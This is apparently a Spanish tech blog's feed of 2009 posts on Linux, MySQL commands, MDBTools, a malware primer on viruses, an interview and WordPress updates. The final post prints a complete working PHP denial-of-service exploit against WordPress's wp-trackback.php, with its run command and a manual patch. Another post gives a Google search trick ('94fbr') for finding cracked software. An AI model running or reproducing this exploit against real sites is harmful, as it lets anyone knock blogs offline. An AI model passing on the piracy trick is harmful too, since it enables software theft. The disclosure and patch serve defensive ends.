Leyendo algunos tweets me encuentro en este sitio, un vídeo muy interesante el cual nos muestra una computación, entre Microsoft y GNU/Linux la competencia tiene 2 bandos por cada lado, en el lado del mal participan Windows Vista, y el recién salido del Horno Windows 7, mientras que por GNU/Linux participan Ubuntu 9.04 y el nuevo consentido Ubuntu 9.10
La idea del reto es bastante sencillo, el primero sistema operativo en arrancar… ¿Quien ganara? Hagan sus apuestas!!!!
Desde hoy y hasta el próximo 1 de noviembre se realizaran en Cucuta la quinta edición de las Jornadas de Software Libre, estas jornadas son un espacio donde todas la comunidades de Software Libre en Colombia, se reunen para intercambiar experiencias, mostrar sus proyectos actuales, crear alianzas y definir un norte para el Software Libre en nuestro país.
Este espacio es una muy buena oportunidad para conocer a otras personas del país que son partidarias y defensoras del Software Libre, conocer nuevos amigos, y pasar un fin de semana muy agradable rodeado con individuos que tienen una pasión en común.
A continuación dejo el cronograma de los días, y los enlaces de interés:
Esperamos que muchos asistan y nos cuenten todos los detalles a aquellos que por una u otra razón no pudimos asistir.
Cuantas veces nos ha sucedido que estamos esperando un informe o un documento y cuando por fin recibimos el archivo sucede que este llega en un formato de esos raros…para ser más exacto en un formato XLSX esos formatos que Microsoft pone de moda haciendo lo que quiere con los estándares.
Supongamos que no tenemos como abrir este archivo o que simplemente nos encontramos en un computador que no es el nuestro y no queremos dejar muchos rastros al respecto de lo que hacemos con determinados archivos ¿Cómo lo modificamos?
Bueno pues para este tipo de cosas nació Sheetster es una aplicación WEB Gratis Y LIBRE para editar “rápidamente” archivos con este tipo de formatos y hojas de cálculo en general.
Para trabajar se basa en JAVA (así que se requiere el JRE) y por lo mismo tiene unos efectos visuales bastante interesantes, pero que probablemente con el tiempo se vuelvan cosa del montón.
Igualmente me pareció interesante que desde la página oficial promocionen la versión Servidor local de esta aplicación, debo confesar que no la he probado pero suena bastante interesante.
Hace poco necesitaba exportar una base de datos MYSQL que tengo en mi servidor localhost, Sin embargo no queria instalar phpmyadmin para hacerlo de manera grafica, asi que me puse a la tarea de leer y muy rapidamente encontre la solucion y en realidad muy sencilla, se trata del comando mysqldump y su sintaxis es:
mysqldump -h ip_servidor -u usuario_bd -p basededatos>archivo.sql
Y eso es todo, como resultado tendremos un archivo .sql en el cual se encontrara toda la informacion de la base de datos, con este archivo podremos montar nuestra base de datos en otro servidor.
Si por el contrario ya tenemos nuestro archivo .sql y lo que queremos es importar nuestra base de datos, debemos hacer lo siguiente:
#Nos conectamos al servidor:
mysql -h ip_servidor -u usuario -p
#Creamos la base de datos:
create database prueba;
#Le decimos al motor cual BD usaremos:
use prueba;
#Ahora le damos la ubicacion de nuestro archivo .sql
source /home/usuario/Desktop/archivo.sql
Con esto habremos importado con exito nuestra base de datos a otro servidor, cabe aclarar que hay aplicaciones que hacen mucho mas facil el proceso como (phpmyadmin), pero no esta de mas saberlo hacer a mano.
Microsoft en su intento por dominar el mundo intenta hacer software para todas las necesidades de los informáticos. En esta ocasión presentan una actualización de su aplicación de administración de vulnerabilidades Microsoft Baseline Security Analyzer (MBSA).
Puede ser que no sea la mejor (de hecho no lo es) pero para las personas que quieren empezar a conocer de que se trata las vulnerabilidades o que desean hacer un muy rápido vistazo de su red esta herramienta puede que le ayude a examinar de manera superficial y así hacerse a una idea de la seguridad en su entorno.
Es una herramienta gratis que incluye interface tanto grafica como de línea de comandos (poco a poco Microsoft entiende de esta necesidad). MBSA no está en nuestro idioma, pero realmente no es un inconveniente pues que como siempre es muy intuitivo, hecho a prueba de…
Tiene cosas malas como que necesita conectarse a internet para descargar las “recomendaciones” de Microsoft, solo funciona obviamente para “escanear” maquinas que ejecuten sistemas operativos de Microsoft.
NOTA: MBSA NO es una herramienta profesional y probablemente NUNCA lo sea. Sin embargo para las personas que DESEAN EMPEZAR pueden hacerlo con este software.
Hace ya varios días mi profesor de bases de datos, dejo en Internet una base de datos para hacer un taller. (Hasta ahí todo normal) Pero cuando descargue el archivo resulta que dicho archivo tenía extensión .mdb (Archivo de access). Lo primero que pensé fue listo debe haber algo con lo que se pueda abrir esta cosa en mi Debian. Basto con buscar en Google y en 5 minutos encontré esta aplicación MDBTools gracias a la cual pude terminar mi tarea XD.
MDBTools es una herramienta que nos permite exportar datos y esquemas desde archivos producidos por MS Access 97/2000/XP/2003.
Para instalar:
# aptitude install mdbtools
Si prefieres descargar las fuentes acá.
El modo de uso es muy sencillo, simplemente abres el archivo .mdb y te mostrará algo como la imagen de arriba (Muestra las tablas de la base de datos).
Definition: Permite ver la definición de la tabla (Nombres de campos, tipo de datos, tamaño y las keys).
Data: Muestra las tablas con los datos.
Export: Con esta opción podemos exportar los datos de las tablas a un archivo de texto.
Adicional a estas opciones hay otra que nos permite hacer Queries. (A la cual accedemos dando click en el icono de los dos engranajes)
Con respecto a esta última opción tengo para decir que no me han funcionado consultas más estructuradas, solamente las simples.
No es más espero que sea de utilidad para alguien . Hasta la próxima!!.
Mucha gente tiende a confundir los términos exploits y xploits o creen que significan lo mismo, sin embargo, aunque se escriban casi de la misma forma tienen grandes diferencias de carácter conceptual. En esta oportunidad quiero explicarles desde mi punto de vista: que es un Exploit y un Xploit, para que podamos ver claramente las diferencias que hay entre ellos y de esta forma no volver a confundirlos.
Un Xploit son las conocidas y famosas postales de gusanito falsas, que su función es crear una pagina idéntica a la de hotmail,gmail, yahoo, facebook, etc, para que los usuarios digiten allí su password. El procedimiento es sencillo. A la víctima le llega un correo diciendo que alguna persona (puede ser conocida o no) le mando una tarjeta postal, la víctima por curiosidad abre el correo y este dice que para abrir la postal debe dar click en un enlace, sin embargo este enlace es falso y lo que hace es abrir el formulario idéntico de hotmail (o de otro servicio de correo) creado por el atacante. Estando allí, la víctima simplemente cree que se le cerro hotmail y vuelve a escribir la contraseña sin saber que ese formulario es falso.
Un Exploit es un programa que logra explotar un bug o fallo de algún programa o hardware, causando que este funcione de tal forma que no fue pensado en un comienzo, Dichos programas son hechos generalmente en C, perl, python, ruby, php y su función generalmente es violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros.
Espero que haya quedado un poco mas claro las diferencias que hay entre, un termino y el otro, y si alguien no esta de acuerdo con lo expuesto, con gusto lo invito a que me diga desde su punto de vista cual es la diferencia entre estos dos términos.
navegando con la red, me encuentro con un truco muy curioso el cual nos brinda la posibilidad de usar el poder de google para buscar software con medicina incluida, esto quiere decir, que si lanzamos una busqueda personalizada esta nos arrojara muchos enlaces para descargar, software con el serial, crack o keygen incluido. Para lograr esto, solo basta con buscar en google de la siguiente manera:
94fbr y el nombre del programa.
Un ejemplo:
Es muy util cuando aquellos que usan software privativo, necesitan descargar la aplicacion con la medicina incluida.
Nota: Rincon Informatico, en ningun momento promueve la pirateria de software, esa accion es un delito, mejor sientete libre y usa Software Libre
Debido al bug que se dio a conocer hace algunos dias y del cual hablamos aqui en Rincon Informatico, la gente de WordPress lanzo la version 2.8.5, en la que se soluciona este y otros bugs importantes, por el momento no hay version oficial en español, pero puedes usar algunos parches disponibles.
link descarga wordpress 2.8.5 oficial
Link descarga wordpress 2.8.5 español no oficial
Recomendamos a todos los usuarios de este CMS que actualicen sus blogs, para estar preparados ante cualquier ataque, ya que uno de los puntos mas importantes para estar seguros en la red, es mantener actualizado todas nuestras aplicaciones web
Primera entrega de este especial en el que intentaremos abordar los principales tipos de Malware que existen, para esta ocasión empezaremos con la explicación y desambiguación de los virus, o mejor, de lo que la gente piensa que es un virus informático.
Especial Malware, Negocio Familiar. Introducción.
Los virus informáticos existen prácticamente desde que nacieron los computadores, en si los Virus son un tipo de comportamiento, de hecho por eso se adopto darles ese nombre a este tipo de programas.
Veamos una definición de que es un virus informático por parte de Symantec:
Es un programa parasito escrito intencionalmente para entrar en un computador sin permiso del usuario o su conocimiento. La palabra parasito es usada por el virus se adhiere a otros archivos o sectores del disco duro y realiza copias de sí mismo para extenderse. Normalmente hacen pocas cosas, pero al volverse más grande puede causar graves problemas en el rendimiento del sistema computacional. En ningún momento se puede asumir que un virus es inofensivo y no se puede dejar en el sistema.
Esta es una definición muy buena, pero al mismo tiempo es bastante antigua.
En esencia un virus solo intenta realizar operaciones dañinas en los computadores donde cae o resulta instalado, por lo mismo un virus es como tal un programa; completo, es decir, puede ser comparado tranquilamente con un juego o con un reproductor de música.
Los virus son el Malware más antiguo, el primero del que se tiene conocimiento es un juego llamado “Guerra Nuclear” (Core Wars) y ganaba el primer equipo de desarrolladores que lograra hacer un programa que “colgara” el computador solamente con la ejecución de su software.
Supongamos el siguiente ambiente:
Computador con sistema operativo Windows XP (Sin Anti-virus), una aplicación cualquiera (en este caso Explorer) y una memoria USB (infectada con el virus, W32/Carnage.E).
Imaginemos un usuario “inexperto” que conecta la memoria USB infectada al computador y sin más trabaja con los archivos que están contenidos en dicha memoria.
El computador del “inexperto” usuario se ha infectado con nuestro W32/Carnage.E el nunca le dio “doble clic” al virus, pero el hecho de que Windows SIEMPRE intente “ofrecer” acciones sobre las memorias USB (si, la ventana esa que sale cada vez que conectas una Memoria USB) hace que el virus se active, se copie al Disco duro y comience su macabro objetivo.
A cualquier parte. Existen diferentes técnicas de ocultamiento que usan los virus uno de ellos en esconderse en otro archivo o en otro programa.
Veamos un par de ellas.
Un clásico es ocultarse dentro de otro archivo sobre-escribiendo el archivo inofensivo.
Ejemplo:
Una vez el virus se ejecuta el archivo quedaría de la siguiente manera:
¿Qué paso entonces con el otro archivo? Sencillamente se dañó. Y cada vez que el usuario intente ejecutar el programa que él cree que esta en dicho archivo, lo único que hará es ejecutar el virus, una y otra vez.
Otra forma de ocultarse en “adjuntarse” a otro archivo que es inofensivo.
En este caso el virus no Sobre-escribe el otro archivo haciendo que el usuario no note nada raro en su equipo, puesto que puede continuar trabajando tranquilamente.
El ultimo es el más “técnico” de todos.
Sucede que el virus, es “inteligente” y se copia de cierta manera en el archivo inofensivo con el único fin de burlar los antivirus, pues el código del virus no se encuentra en el mismo lugar, sino que se “reparte” a lo largo del archivo víctima.
El usuario puede seguir trabajando como si nada.
Hollywood ha dañado bastante lo que se esperan de los virus, es por esto que las personas piensan que un virus pueda, literalmente, dañar su computador; haciendo volar por los aires el disco duro o explotando de manera espectacular el monitor.
Darse cuenta de que tu computador se encuentra infectado por un virus es un poco más sutil, si cuentas con un anti-virus no puedes estar seguro de que no tienes algún virus, ahora si NO cuentas con anti-virus puedes estar COMPLETAMENTE seguro de que tienes virus.
Los virus como ya vimos atacan principalmente el desempeño de tu computador, es decir, si tu equipo tardaba dos minutos en encender, ahora tarde 3, las aplicaciones que usas son más lentas o estas se cierran inexplicablemente, el explorador de archivos falla, algunos archivos se pierden…son síntomas de que PUEDES estar infectado con algún tipo de virus informático.
Básicamente la única contra-medida que existe para evitar ser infectado por un virus es un anti-virus….y si un poco de malicia indígena (sentido común).
De hecho creo que es la única forma en la que podemos mantener un sistema operativo Windows “limpio” de virus.
¿Por qué?
Los medios de infección de los virus son casi siempre los mismos:
Correos electrónicos con archivos adjuntos
Mensaje instantáneo con link a una página web en la debes descargar algo
Dispositivos de almacenamiento infectado (CD-ROM, memoria USB)
Instalación de software Pirata (crack)
Así que solo hace falta sospechar un poco y tener un poco de sentido común cuando hacemos clic en los enlaces que nos envían por correos electrónicos o con las memorias que usamos en nuestros computadores. Recuerden que en Rincon Informático ya hablamos sobre como quitar el “AutoRun” que Windows siempre tiene configurado sobre los dispositivos de almacenamiento, como las memorias USB.
¿Pero para eso tengo Anti-Virus…no?
Pues resulta que no. Los anti-virus también funcionan de una forma que resulta casi Estándar en todos y es por esta razón que es posible burlar dicha “protección”.
¿Qué el anti-virus no sirve?
No hemos dicho que no sirve. Lo que sucede es que solo hay básicamente dos formas de detectar un virus informático, una es que lo conozcas y la otra forma es analizando su comportamiento.
La primera forma es llamada Firmas de virus y la segunda se conoce como Heurística. Pero eso se sale un poco de la idea del especial, en entradas futuras espero escribir sobre este tipo de temas que resultan ser igual o más interesantes sobre los virus.
En la actualidad nunca sabemos cuál es el último grito de la moda en Virus, existen tantos que nadie puede llevar una estadística actualizada y mucho menos un conteo lo suficientemente certero que nos entregue un número para hacer cálculos, pero si se puede intentar luchar contra ellos.
En la próxima entrada hablaremos un poco sobre los Troyanos y los gusanos.
Entrada dedicada a La Muñeca, fuente de toda inspiración. Sé que más rápido de lo que esperas saldrá trabajo.
Siguiendo con la iniciativa de entrevistar a varios de los ponentes del tercer Encuentro Internacional de Seguridad Informatica (EISI 3), llego el turno de Luis Uribe,mas conocido como Acme un Linuxero, defensor del Software Libre y aspirante a desarrollador del proyecto Debian, esperamos que les guste la entrevista y que conozcan un poco mas de esta gran persona:
RI:¿Por qué Acme?
Acme: El nick viene de los tiempos de irc por alla en el 98, y se quedó en algunos servicios de correo. No recuerdo porque lo escogí, pero si se que es más complicado cambiar el nick que escoger uno nuevo.
Acme:Si te refieres a mis estudios, son varios e incompletos: Yo quiero terminar la carrera pero en la universidad no me han dejado salir. El resto ha sido iniciativa propia: muchos libros de programación, listas de correo, blogs, amigos geeks, etc.
Hay dos cosas que mi experiencia me ha enseñado:
- Un título universitario no es garantía de que sepas.
- En la mayoría de empresas o paises, un título universitario así sea de la universidad de la esquina, es muy útil para acceder a becas, cursos, viajes permisos de trabajo y mejores ofertas.
Entonces: hay que graduarse e investigar mucho por fuera.
RI: ¿Por qué software libre?
Acme: Al principio fué por razones técnicas, una plataforma como MS Windows no me permitía hacer lo que yo quería, es muy limitada y restrictiva con el usuario.
Pero después de conocer la filosofía del Software Libre, me di cuenta que estaba de acuerdo con ella (y la venia practicando hace un tiempo), así que fue el complemento ideal.
Obviamente uso software libre o privativo cuando es necesario, pero prefiero no pasarme al lado oscuro de la fuerza.
Acme: Si avanza pero muy poco, creo que necesitamos más lideres y menos personas esperando a colaborar. La mejor forma de colaborar es liderando un proyecto 
Un actor importante en paises como Ecuador y Venezuela, ha sido el gobierno, independendientemente de colores y banderas, no se puede negar que políticas estatales le dan un empujon al uso de Software Libre.
Debian. Una configuración normal permite trabajar a un usuario de internet, oficina y juegos. La he probado en casa y entornos de oficina y no me presenta problemas, el usuario perezoso es el que le encuentra problemas a la distribución, y eso va a pasar siempre aunque uses Ubuntu, Debian o cualquier Windows.
Otro tema es que si tratas al usuario como idiota, siempre lo va a ser.
Acme: Quisiera verlo más reconocido por los usuarios, que comprendan el tema de las libertades y porque no le deberíamos entregar nuestros datos a una empresa.
Acme: Un par de tatuajes, más compromiso con el proyecto Debian, un par de viajes, muchas cervezas, pero no se en que orden. Hay muchas ideas pero ninguna con fecha definida. Por lo pronto estoy dedicado con alma, vida y sombrero a mi trabajo actual en Sisfo.
RI: ¿MySql o Postgres?
Acme: Los dos, casi siempre el problema no es del motor de la base de datos sino de un mal diseño de tablas, pocos recursos de máquina y consultas mal realizadas.
GNU/Linux, Debian específicamente. No he probado Open Solaris aún.
Acme: Club Colombia . Aunque prefiero el Jack Daniels y/o Smirnoff.
Muchas gracias a Luis por haber contestado muy amablemente las preguntas, para los que desean mas informacion pueden visitar la pagina personal de acme, haciendo click aqui
Gracias a Mirphak me encuentro con este enlace que habla sobre un nuevo bug de WordPress que afecta a todas las versiones incluyendo la ultima.
El problema radica en el archivo wp-trackbacks.php y permite a cualquier novato, individuo o persona, dejar offline a cualquier blog que use WordPress como CMS, con tan solo 5 minutos y una veintena de consultas, si leyeron bien, solo 20 consultas no se necesitan botnes, redes zombies o supercomputadoras para hacer este tipo de ataque DoS.
Por el momento se ha publicado este exploit, creado en php y que se ejecuta en la consola, pasando por parametro la url del sitio vulnerable, algo asi:
php exploit.php http://blogvulnerable.com
Y aqui esta el codigo del exploit:
<?php
//wordpress Resource exhaustion Exploit
//http://rooibo.wordpress.com/
//security@wordpress.org contacted and get a response,
//but no solution available.
if(count($argv) < 2) {
echo "You need to specify a url to attack\n";
exit;
} $url = $argv[1]; $data = parse_url($url);
if(count($data) < 2) {
echo "The url should have http:// in front of it, and should be complete.\n";
exit;
} if(count($data) == 2) {
$path = '';
} else {
$path = $data['path'];
}
$path = trim($path,'/');
$path .= '/wp-trackback.php';
if($path{0} != '/') {
$path = '/'.$path;
} $b = "";
$b = str_pad($b,140000,'ABCEDFG');
$b = utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol'; $count = 0;
while(1) {
$fp = @fsockopen($data['host'],80);
if(!$fp) {
if($count > 0) {
echo "down!!!!\n";
exit;
}
echo "unable to connect to: ".$data['host']."\n";
exit;
} fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n"); echo "hit!\n";
$count++;
} ?>
Todavia no existe parche para reparar el bug, la unica solucion conocida hasta el momento, es la que se manifiesta en el enlace donde nos cuentan el parche:
Editar el archivo wp-trackbacks.php y buscar esta linea:
$charset = $_POST['charset'];
y cambiarla por esta:
$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }
Para mas informacion pueden visitar este enlace, en el cual explican mucho mas a fondo en que consiste el bug, asi pues, todos a corregir nuestro wordpress, para asi evitar futuros dolores de cabeza.
Nota: Rincon Informatico no se ha responsable por el mal uso que algunos usuarios le puedan dar a esta informacion, nuestro unico objetivo es que los usuarios de wordpress se enteren de este problema y lo corrijan para no tener problemas.
